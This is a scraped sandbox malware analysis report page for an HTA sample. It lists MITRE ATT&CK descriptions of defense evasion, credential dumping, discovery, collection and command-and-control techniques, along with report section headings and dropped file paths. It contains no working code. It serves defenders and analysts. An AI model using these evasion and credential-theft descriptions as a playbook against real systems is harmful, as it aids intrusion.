Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report malw.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cacd01212ac9495e.timestamp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4fbe7d31-f02c-417e-b6eb-c285986a2232.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250108125435Z-227.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
malw.hta

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre